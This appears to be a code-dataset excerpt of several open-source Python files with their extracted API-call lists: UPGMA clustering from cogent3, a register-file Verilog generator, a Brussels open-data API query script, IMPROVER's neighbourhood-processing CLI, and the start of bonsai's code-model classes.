25, 494, 56), 'tensorflow.compat.v1.split', 'tf.split', ({(494, 34, 494, 49): 'hyper_new_state', (494, 51, 494, 52): '2', (494, 54, 494, 55): '1'}, {}), '(hyper_new_state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((495, 20, 495, 50), 'tensorflow.compat.v1.concat', 'tf.concat', ({(495, 30, 495, 46): '[new_h, hyper_h]', (495, 48, 495, 49): '1'}, {}), '([new_h, hyper_h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((496, 20, 496, 50), 'tensorflow.compat.v1.concat', 'tf.concat', ({(496, 30, 496, 46): '[new_c, hyper_c]', (496, 48, 496, 49): '1'}, {}), '([new_c, hyper_c], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((497, 24, 497, 64), 'tensorflow.compat.v1.concat', 'tf.concat', ({(497, 34, 497, 60): '[new_total_h, new_total_c]', (497, 62, 497, 63): '1'}, {}), '([new_total_h, new_total_c], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((110, 15, 110, 40), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(110, 25, 110, 31): 'concat', (110, 33, 110, 39): 'w_full'}, {}), '(concat, w_full)', True, 'import tensorflow.compat.v1 as tf\n'), ((117, 12, 117, 22), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(117, 20, 117, 21): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((120, 14, 120, 28), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(120, 22, 120, 27): 'new_c'}, {}), '(new_c)', True, 'import tensorflow.compat.v1 as tf\n'), ((120, 31, 120, 44), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(120, 42, 120, 43): 'o'}, {}), '(o)', True, 'import tensorflow.compat.v1 as tf\n'), ((122, 20, 122, 48), 'tensorflow.compat.v1.concat', 'tf.concat', ({(122, 30, 122, 44): '[new_c, new_h]', (122, 46, 122, 47): '(1)'}, {}), '([new_c, new_h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((150, 20, 150, 56), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(150, 44, 150, 55): 'gamma_start'}, {}), '(gamma_start)', True, 'import tensorflow.compat.v1 as tf\n'), ((177, 20, 177, 56), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(177, 44, 177, 55): 'gamma_start'}, {}), '(gamma_start)', True, 'import tensorflow.compat.v1 as tf\n'), ((191, 21, 191, 40), 'tensorflow.compat.v1.square', 'tf.square', ({(191, 31, 191, 39): 'x - mean'}, {}), '(x - mean)', True, 'import tensorflow.compat.v1 as tf\n'), ((219, 15, 219, 52), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(219, 39, 219, 51): 'weight_start'}, {}), '(weight_start)', True, 'import tensorflow.compat.v1 as tf\n'), ((232, 13, 232, 28), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(232, 23, 232, 24): 'x', (232, 26, 232, 27): 'w'}, {}), '(x, w)', True, 'import tensorflow.compat.v1 as tf\n'), ((305, 12, 305, 22), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(305, 20, 305, 21): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((308, 59, 308, 72), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(308, 70, 308, 71): 'o'}, {}), '(o)', True, 'import tensorflow.compat.v1 as tf\n'), ((482, 17, 482, 43), 'tensorflow.compat.v1.concat', 'tf.concat', ({(482, 27, 482, 39): '[i, j, f, o]', (482, 41, 482, 42): '1'}, {}), '([i, j, f, o], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((484, 21, 484, 43), 'tensorflow.compat.v1.split', 'tf.split', ({(484, 30, 484, 36): 'concat', (484, 38, 484, 39): '4', (484, 41, 484, 42): '1'}, {}), '(concat, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((489, 12, 489, 22), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(489, 20, 489, 21): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((492, 67, 492, 80), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(492, 78, 492, 79): 'o'}, {}), '(o)', True, 'import tensorflow.compat.v1 as tf\n'), ((106, 22, 106, 50), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(106, 46, 106, 49): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((115, 26, 115, 36), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(115, 34, 115, 35): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((119, 18, 119, 50), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(119, 29, 119, 49): '(f + self.forget_bias)'}, {}), '(f + self.forget_bias)', True, 'import tensorflow.compat.v1 as tf\n'), ((119, 53, 119, 66), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(119, 64, 119, 65): 'i'}, {}), '(i)', True, 'import tensorflow.compat.v1 as tf\n'), ((147, 6, 147, 29), 'tensorflow.compat.v1.get_variable_scope', 'tf.get_variable_scope', ({}, {}), '()', True, 'import tensorflow.compat.v1 as tf\n'), ((153, 50, 153, 78), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(153, 74, 153, 77): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((174, 6, 174, 29), 'tensorflow.compat.v1.get_variable_scope', 'tf.get_variable_scope', ({}, {}), '()', True, 'import tensorflow.compat.v1 as tf\n'), ((180, 46, 180, 74), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(180, 70, 180, 73): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((209, 6, 209, 29), 'tensorflow.compat.v1.get_variable_scope', 'tf.get_variable_scope', ({}, {}), '()', True, 'import tensorflow.compat.v1 as tf\n'), ((221, 15, 221, 64), 'tensorflow.compat.v1.random_normal_initializer', 'tf.random_normal_initializer', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((231, 22, 231, 57), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(231, 46, 231, 56): 'bias_start'}, {}), '(bias_start)', True, 'import tensorflow.compat.v1 as tf\n'), ((303, 26, 303, 36), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(303, 34, 303, 35): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((307, 18, 307, 50), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(307, 29, 307, 49): '(f + self.forget_bias)'}, {}), '(f + self.forget_bias)', True, 'import tensorflow.compat.v1 as tf\n'), ((307, 53, 307, 66), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(307, 64, 307, 65): 'i'}, {}), '(i)', True, 'import tensorflow.compat.v1 as tf\n'), ((446, 22, 446, 50), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(446, 46, 446, 49): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((487, 26, 487, 36), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(487, 34, 487, 35): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((491, 18, 491, 50), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(491, 29, 491, 49): '(f + self.forget_bias)'}, {}), '(f + self.forget_bias)', True, 'import tensorflow.compat.v1 as tf\n'), ((491, 53, 491, 66), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(491, 64, 491, 65): 'i'}, {}), '(i)', True, 'import tensorflow.compat.v1 as tf\n')]
u6052029/cogent3
src/cogent3/cluster/UPGMA.py
ca0efcb7f60b715bcbfbecd924cdb98a53cefe20
# usr/bin/env python """Functions to cluster using UPGMA upgma takes an dictionary of pair tuples mapped to distances as input. UPGMA_cluster takes an array and a list of PhyloNode objects corresponding to the array as input. Can also generate this type of input from a DictArray using inputs_from_dict_array function. Both return a PhyloNode object of the UPGMA cluster """ import numpy from numpy import argmin, array, average, diag, ma, ravel, sum, take from cogent3.core.tree import PhyloNode from cogent3.util.dict_array import DictArray __author__ = "Catherine Lozupone" __copyright__ = "Copyright 2007-2020, The Cogent Project" __credits__ = ["Catherine Lozuopone", "Rob Knight", "Peter Maxwell"] __license__ = "BSD-3" __version__ = "2020.7.2a" __maintainer__ = "Catherine Lozupone" __email__ = "[email protected]" __status__ = "Production" numerictypes = numpy.core.numerictypes.sctype2char Float = numerictypes(float) BIG_NUM = 1e305 def upgma(pairwise_distances): """Uses the UPGMA algorithm to cluster sequences pairwise_distances: a dictionary with pair tuples mapped to a distance returns a PhyloNode object of the UPGMA cluster """ darr = DictArray(pairwise_distances) matrix_a, node_order = inputs_from_dict_array(darr) tree = UPGMA_cluster(matrix_a, node_order, BIG_NUM) index = 0 for node in tree.traverse(): if not node.parent: node.name = "root" elif not node.name: node.name = "edge." + str(index) index += 1 return tree def find_smallest_index(matrix): """returns the index of the smallest element in a numpy array for UPGMA clustering elements on the diagonal should first be substituted with a very large number so that they are always larger than the rest if the values in the array.""" # get the shape of the array as a tuple (e.g. (3,3)) shape = matrix.shape # turn into a 1 by x array and get the index of the lowest number matrix1D = ravel(matrix) lowest_index = argmin(matrix1D) # convert the lowest_index derived from matrix1D to one for the original # square matrix and return row_len = shape[0] return divmod(lowest_index, row_len) def condense_matrix(matrix, smallest_index, large_value): """converges the rows and columns indicated by smallest_index Smallest index is returned from find_smallest_index. For both the rows and columns, the values for the two indices are averaged. The resulting vector replaces the first index in the array and the second index is replaced by an array with large numbers so that it is never chosen again with find_smallest_index. """ first_index, second_index = smallest_index # get the rows and make a new vector that has their average rows = take(matrix, smallest_index, 0) new_vector = average(rows, 0) # replace info in the row and column for first index with new_vector matrix[first_index] = new_vector matrix[:, first_index] = new_vector # replace the info in the row and column for the second index with # high numbers so that it is ignored matrix[second_index] = large_value matrix[:, second_index] = large_value return matrix def condense_node_order(matrix, smallest_index, node_order): """condenses two nodes in node_order based on smallest_index info This function is used to create a tree while condensing a matrix with the condense_matrix function. The smallest_index is retrieved with find_smallest_index. The first index is replaced with a node object that combines the two nodes corresponding to the indices in node order. The second index in smallest_index is replaced with None. Also sets the branch length of the nodes to 1/2 of the distance between the nodes in the matrix""" index1, index2 = smallest_index node1 = node_order[index1] node2 = node_order[index2] # get the distance between the nodes and assign 1/2 the distance to the # lengthproperty of each node distance = matrix[index1, index2] nodes = [node1, node2] d = distance / 2.0 for n in nodes: if n.children: n.length = d - n.children[0].TipLength else: n.length = d n.TipLength = d # combine the two nodes into a new PhyloNode object new_node = PhyloNode() new_node.children.append(node1) new_node.children.append(node2) node1.parent = new_node node2.parent = new_node # replace the object at index1 with the combined node node_order[index1] = new_node # replace the object at index2 with None node_order[index2] = None return node_order def UPGMA_cluster(matrix, node_order, large_number): """cluster with UPGMA matrix is a numpy array. node_order is a list of PhyloNode objects corresponding to the matrix. large_number will be assigned to the matrix during the process and should be much larger than any value already in the matrix. WARNING: Changes matrix in-place. WARNING: Expects matrix to already have diagonals assigned to large_number before this function is called. """ num_entries = len(node_order) tree = None for i in range(num_entries - 1): smallest_index = find_smallest_index(matrix) index1, index2 = smallest_index # if smallest_index is on the diagonal set the diagonal to large_number if index1 == index2: matrix[diag([True] * len(matrix))] = large_number smallest_index = find_smallest_index(matrix) row_order = condense_node_order(matrix, smallest_index, node_order) matrix = condense_matrix(matrix, smallest_index, large_number) tree = node_order[smallest_index[0]] return tree def inputs_from_dict_array(darr): """makes inputs for UPGMA_cluster from a DictArray object """ darr.array += numpy.eye(darr.shape[0]) * BIG_NUM nodes = list(map(PhyloNode, darr.keys())) return darr.array, nodes
[((42, 11, 42, 40), 'cogent3.util.dict_array.DictArray', 'DictArray', ({(42, 21, 42, 39): 'pairwise_distances'}, {}), '(pairwise_distances)', False, 'from cogent3.util.dict_array import DictArray\n'), ((64, 15, 64, 28), 'numpy.ravel', 'ravel', ({(64, 21, 64, 27): 'matrix'}, {}), '(matrix)', False, 'from numpy import argmin, array, average, diag, ma, ravel, sum, take\n'), ((65, 19, 65, 35), 'numpy.argmin', 'argmin', ({(65, 26, 65, 34): 'matrix1D'}, {}), '(matrix1D)', False, 'from numpy import argmin, array, average, diag, ma, ravel, sum, take\n'), ((83, 11, 83, 42), 'numpy.take', 'take', ({(83, 16, 83, 22): 'matrix', (83, 24, 83, 38): 'smallest_index', (83, 40, 83, 41): '0'}, {}), '(matrix, smallest_index, 0)', False, 'from numpy import argmin, array, average, diag, ma, ravel, sum, take\n'), ((84, 17, 84, 33), 'numpy.average', 'average', ({(84, 25, 84, 29): 'rows', (84, 31, 84, 32): '0'}, {}), '(rows, 0)', False, 'from numpy import argmin, array, average, diag, ma, ravel, sum, take\n'), ((120, 15, 120, 26), 'cogent3.core.tree.PhyloNode', 'PhyloNode', ({}, {}), '()', False, 'from cogent3.core.tree import PhyloNode\n'), ((162, 18, 162, 42), 'numpy.eye', 'numpy.eye', ({(162, 28, 162, 41): 'darr.shape[0]'}, {}), '(darr.shape[0])', False, 'import numpy\n')]
kf7lsu/RegfileCompiler-public
src/python/make_store_entry.py
0845f1458137cef06d584047bb4287a72c6afbab
#this code will generate the structural verilog for a single entry in the register file #takes in the output file manager, the entry number, the number of bits, the number of reads, and the width of the #tristate buffers on the read outputs #expects the same things as make_store_cell, ensure code is valid there #Matthew Trahms #EE 526 #4/20/21 from make_store_cell import make_store_cell def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num): #just need to create the correct number of bits #this and the make_store_array are going to be pretty simple for bit in range(bits): make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num) return if __name__ == '__main__': f = open('store_entry_test.txt', 'w') rows = 4 cols = 2 reads = 2 for row in range(rows): make_store_entry(f, row, cols, reads, 1, 0) f.close()
[((17, 2, 17, 78), 'make_store_cell.make_store_cell', 'make_store_cell', ({(17, 18, 17, 26): 'out_file', (17, 28, 17, 40): 'entry_number', (17, 42, 17, 45): 'bit', (17, 47, 17, 52): 'reads', (17, 54, 17, 64): 'buff_width', (17, 66, 17, 77): 'regfile_num'}, {}), '(out_file, entry_number, bit, reads, buff_width, regfile_num)', False, 'from make_store_cell import make_store_cell\n')]
oceandelee/tac
module1/api.py
62ffbcb31b374a9fa83a1ee6010b2e00f2de8a7c
"""API for AVB""" import json import sys import requests def actualite_found (): osm = "https://opendata.bruxelles.be/api/datasets/1.0/search/?q=" data = { "nhits":0, "parameters":{ "dataset":"actualites-ville-de-bruxelles", "timezone":"UTC", "q":"actualite", "language": "fr", "rows":10, "start":0, "sort":[ "published" ] , "format":"json" } , "records":[] } resp = requests.get(osm, data) if resp.status_code == 200: print(resp.json()["datasets"][0]["metas"]) else: print("actualite not found") return resp def get_result(resp,n,attribut): metas = resp.json()["datasets"][n]["metas"] return metas[attribut] def nb_result(resp): return len(resp.json()["datasets"]) #Example of use if __name__ == "__main__": resp = actualite_found() result = get_result(resp,2,"description") print(result) print(nb_result(resp))
[((31, 11, 31, 34), 'requests.get', 'requests.get', ({(31, 24, 31, 27): 'osm', (31, 29, 31, 33): 'data'}, {}), '(osm, data)', False, 'import requests\n')]
cpelley/improver
improver/cli/nbhood.py
ebf77fe2adc85ed7aec74c26671872a2e4388ded
#!/usr/bin/env python # -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # (C) British Crown Copyright 2017-2021 Met Office. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """Script to run neighbourhood processing.""" from improver import cli from improver.constants import DEFAULT_PERCENTILES @cli.clizefy @cli.with_output def process( cube: cli.inputcube, mask: cli.inputcube = None, *, neighbourhood_output, neighbourhood_shape, radii: cli.comma_separated_list, lead_times: cli.comma_separated_list = None, degrees_as_complex=False, weighted_mode=False, area_sum=False, remask=False, percentiles: cli.comma_separated_list = DEFAULT_PERCENTILES, halo_radius: float = None, ): """Runs neighbourhood processing. Apply the requested neighbourhood method via the NeighbourhoodProcessing plugin to a Cube. Args: cube (iris.cube.Cube): The Cube to be processed. mask (iris.cube.Cube): A cube to mask the input cube. The data should contain 1 for usable points and 0 for discarded points. Only supported with square neighbourhoods. (Optional) neighbourhood_output (str): The form of the results generated using neighbourhood processing. If "probabilities" is selected, the mean probability with a neighbourhood is calculated. If "percentiles" is selected, then the percentiles are calculated with a neighbourhood. Calculating percentiles from a neighbourhood is only supported for a circular neighbourhood. Options: "probabilities", "percentiles". neighbourhood_shape (str): Name of the neighbourhood method to use. Only a "circular" neighbourhood shape is applicable for calculating "percentiles" output. Options: "circular", "square". radii (list of float): The radius or a list of radii in metres of the neighbourhood to apply. If it is a list, it must be the same length as lead_times, which defines at which lead time to use which nbhood radius. The radius will be interpolated for intermediate lead times. lead_times (list of int): The lead times in hours that correspond to the radii to be used. If lead_times are set, radii must be a list the same length as lead_times. degrees_as_complex (bool): Include this option to process angles as complex numbers. Not compatible with circular kernel or percentiles. weighted_mode (bool): Include this option to set the weighting to decrease with radius. Otherwise a constant weighting is assumed. weighted_mode is only applicable for calculating "probability" neighbourhood output using the circular kernel. area_sum (bool): Return sum rather than fraction over the neighbourhood area. remask (bool): Include this option to apply the original un-neighbourhood processed mask to the neighbourhood processed cube. Otherwise the original un-neighbourhood processed mask is not applied. Therefore, the neighbourhood processing may result in values being present in area that were originally masked. percentiles (float): Calculates value at the specified percentiles from the neighbourhood surrounding each grid point. This argument has no effect if the output is probabilities. halo_radius (float): Set this radius in metres to define the excess halo to clip. Used where a larger grid was defined than the standard grid and we want to clip the grid back to the standard grid. Otherwise no clipping is applied. Returns: iris.cube.Cube: A processed Cube. Raises: RuntimeError: If weighted_mode is used with the wrong neighbourhood_output. RuntimeError: If degree_as_complex is used with neighbourhood_output='percentiles'. RuntimeError: If degree_as_complex is used with neighbourhood_shape='circular'. """ from improver.nbhood import radius_by_lead_time from improver.nbhood.nbhood import ( GeneratePercentilesFromANeighbourhood, NeighbourhoodProcessing, ) from improver.utilities.pad_spatial import remove_cube_halo from improver.wind_calculations.wind_direction import WindDirection sum_or_fraction = "sum" if area_sum else "fraction" if neighbourhood_output == "percentiles": if weighted_mode: raise RuntimeError( "weighted_mode cannot be used with" 'neighbourhood_output="percentiles"' ) if degrees_as_complex: raise RuntimeError("Cannot generate percentiles from complex " "numbers") if neighbourhood_shape == "circular": if degrees_as_complex: raise RuntimeError( "Cannot process complex numbers with circular neighbourhoods" ) if degrees_as_complex: # convert cube data into complex numbers cube.data = WindDirection.deg_to_complex(cube.data) radius_or_radii, lead_times = radius_by_lead_time(radii, lead_times) if neighbourhood_output == "probabilities": result = NeighbourhoodProcessing( neighbourhood_shape, radius_or_radii, lead_times=lead_times, weighted_mode=weighted_mode, sum_or_fraction=sum_or_fraction, re_mask=remask, )(cube, mask_cube=mask) elif neighbourhood_output == "percentiles": result = GeneratePercentilesFromANeighbourhood( neighbourhood_shape, radius_or_radii, lead_times=lead_times, percentiles=percentiles, )(cube) if degrees_as_complex: # convert neighbourhooded cube back to degrees result.data = WindDirection.complex_to_deg(result.data) if halo_radius is not None: result = remove_cube_halo(result, halo_radius) return result
[((157, 34, 157, 72), 'improver.nbhood.radius_by_lead_time', 'radius_by_lead_time', ({(157, 54, 157, 59): 'radii', (157, 61, 157, 71): 'lead_times'}, {}), '(radii, lead_times)', False, 'from improver.nbhood import radius_by_lead_time\n'), ((155, 20, 155, 59), 'improver.wind_calculations.wind_direction.WindDirection.deg_to_complex', 'WindDirection.deg_to_complex', ({(155, 49, 155, 58): 'cube.data'}, {}), '(cube.data)', False, 'from improver.wind_calculations.wind_direction import WindDirection\n'), ((178, 22, 178, 63), 'improver.wind_calculations.wind_direction.WindDirection.complex_to_deg', 'WindDirection.complex_to_deg', ({(178, 51, 178, 62): 'result.data'}, {}), '(result.data)', False, 'from improver.wind_calculations.wind_direction import WindDirection\n'), ((180, 17, 180, 54), 'improver.utilities.pad_spatial.remove_cube_halo', 'remove_cube_halo', ({(180, 34, 180, 40): 'result', (180, 42, 180, 53): 'halo_radius'}, {}), '(result, halo_radius)', False, 'from improver.utilities.pad_spatial import remove_cube_halo\n'), ((160, 17, 167, 9), 'improver.nbhood.nbhood.NeighbourhoodProcessing', 'NeighbourhoodProcessing', (), '', False, 'from improver.nbhood.nbhood import GeneratePercentilesFromANeighbourhood, NeighbourhoodProcessing\n'), ((169, 17, 174, 9), 'improver.nbhood.nbhood.GeneratePercentilesFromANeighbourhood', 'GeneratePercentilesFromANeighbourhood', (), '', False, 'from improver.nbhood.nbhood import GeneratePercentilesFromANeighbourhood, NeighbourhoodProcessing\n')]
ipa-mirb/bonsai
bonsai/model.py
cb73317cdf779566f7c496fc39546c9c689aa09c
#Copyright (c) 2017 Andre Santos # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in #all copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #THE SOFTWARE. ############################################################################### # Language Model ############################################################################### class CodeEntity(object): """Base class for all programming entities. All code objects have a file name, a line number, a column number, a programming scope (e.g. the function or code block they belong to) and a parent object that should have some variable or collection holding this object. """ def __init__(self, scope, parent): """Base constructor for code objects. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ self.scope = scope self.parent = parent self.file = None self.line = None self.column = None def walk_preorder(self): """Iterates the program tree starting from this object, going down.""" yield self for child in self._children(): for descendant in child.walk_preorder(): yield descendant def filter(self, cls, recursive=False): """Retrieves all descendants (including self) that are instances of a given class. Args: cls (class): The class to use as a filter. Kwargs: recursive (bool): Whether to descend recursively down the tree. """ source = self.walk_preorder if recursive else self._children return [ codeobj for codeobj in source() if isinstance(codeobj, cls) ] def _afterpass(self): """Finalizes the construction of a code entity.""" pass def _validity_check(self): """Check whether this object is a valid construct.""" return True def _children(self): """Yield all direct children of this object.""" # The default implementation has no children, and thus should return # an empty iterator. return iter(()) def _lookup_parent(self, cls): """Lookup a transitive parent object that is an instance of a given class.""" codeobj = self.parent while codeobj is not None and not isinstance(codeobj, cls): codeobj = codeobj.parent return codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return (' ' * indent) + self.__str__() def ast_str(self, indent=0): """Return a minimal string to print a tree-like structure. Kwargs: indent (int): The number of indentation levels. """ line = self.line or 0 col = self.column or 0 name = type(self).__name__ spell = getattr(self, 'name', '[no spelling]') result = ' ({})'.format(self.result) if hasattr(self, 'result') else '' prefix = indent * '| ' return '{}[{}:{}] {}{}: {}'.format(prefix, line, col, name, result, spell) def __str__(self): """Return a string representation of this object.""" return self.__repr__() def __repr__(self): """Return a string representation of this object.""" return '[unknown]' class CodeStatementGroup(object): """This class is meant to provide common utility methods for objects that group multiple program statements together (e.g. functions, code blocks). It is not meant to be instantiated directly, only used for inheritance purposes. It defines the length of a statement group, and provides methods for integer-based indexing of program statements (as if using a list). """ def statement(self, i): """Return the *i*-th statement from the object's `body`.""" return self.body.statement(i) def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" try: return self.statement(i + 1) except IndexError as e: return None def __getitem__(self, i): """Return the *i*-th statement from the object's `body`.""" return self.statement(i) def __len__(self): """Return the length of the statement group.""" return len(self.body) # ----- Common Entities ------------------------------------------------------- class CodeVariable(CodeEntity): """This class represents a program variable. A variable typically has a name, a type (`result`) and a value (or `None` for variables without a value or when the value is unknown). Additionally, a variable has an `id` which uniquely identifies it in the program (useful to resolve references), a list of references to it and a list of statements that write new values to the variable. If the variable is a *member*/*field*/*attribute* of an object, `member_of` should contain a reference to such object, instead of `None`. """ def __init__(self, scope, parent, id, name, result): """Constructor for variables. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this variable. name (str): The name of the variable in the program. result (str): The type of the variable in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.value = None self.member_of = None self.references = [] self.writes = [] @property def is_definition(self): return True @property def is_local(self): """Whether this is a local variable. In general, a variable is *local* if its containing scope is a statement (e.g. a block), or a function, given that the variable is not one of the function's parameters. """ return (isinstance(self.scope, CodeStatement) or (isinstance(self.scope, CodeFunction) and self not in self.scope.parameters)) @property def is_global(self): """Whether this is a global variable. In general, a variable is *global* if it is declared directly under the program's global scope or a namespace. """ return isinstance(self.scope, (CodeGlobalScope, CodeNamespace)) @property def is_parameter(self): """Whether this is a function parameter.""" return (isinstance(self.scope, CodeFunction) and self in self.scope.parameters) @property def is_member(self): """Whether this is a member/attribute of a class or object.""" return isinstance(self.scope, CodeClass) def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeEntity): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '{}{} {} = {}'.format(' ' * indent, self.result, self.name, pretty_str(self.value)) def __repr__(self): """Return a string representation of this object.""" return '[{}] {} = ({})'.format(self.result, self.name, self.value) class CodeFunction(CodeEntity, CodeStatementGroup): """This class represents a program function. A function typically has a name, a return type (`result`), a list of parameters and a body (a code block). It also has an unique `id` that identifies it in the program and a list of references to it. If a function is a method of some class, its `member_of` should be set to the corresponding class. """ def __init__(self, scope, parent, id, name, result, definition=True): """Constructor for functions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this function. name (str): The name of the function in the program. result (str): The return type of the function in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.parameters = [] self.body = CodeBlock(self, self, explicit=True) self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a function definition or just a declaration.""" return self._definition is self @property def is_constructor(self): """Whether this function is a class constructor.""" return self.member_of is not None def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, (CodeStatement, CodeExpression)) self.body._add(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.parameters: yield codeobj for codeobj in self.body._children(): yield codeobj def _afterpass(self): """Assign a function-local index to each child object and register write operations to variables. This should only be called after the object is fully built. """ if hasattr(self, '_fi'): return fi = 0 for codeobj in self.walk_preorder(): codeobj._fi = fi fi += 1 if isinstance(codeobj, CodeOperator) and codeobj.is_assignment: if codeobj.arguments and isinstance(codeobj.arguments[0], CodeReference): var = codeobj.arguments[0].reference if isinstance(var, CodeVariable): var.writes.append(codeobj) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent params = ', '.join(map(lambda p: p.result + ' ' + p.name, self.parameters)) if self.is_constructor: pretty = '{}{}({}):\n'.format(spaces, self.name, params) else: pretty = '{}{} {}({}):\n'.format(spaces, self.result, self.name, params) if self._definition is not self: pretty += spaces + ' [declaration]' else: pretty += self.body.pretty_str(indent + 2) return pretty def __repr__(self): """Return a string representation of this object.""" params = ', '.join(map(str, self.parameters)) return '[{}] {}({})'.format(self.result, self.name, params) class CodeClass(CodeEntity): """This class represents a program class for object-oriented languages. A class typically has a name, an unique `id`, a list of members (variables, functions), a list of superclasses, and a list of references. If a class is defined within another class (inner class), it should have its `member_of` set to the corresponding class. """ def __init__(self, scope, parent, id_, name, definition=True): """Constructor for classes. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this class. name (str): The name of the class in the program. """ 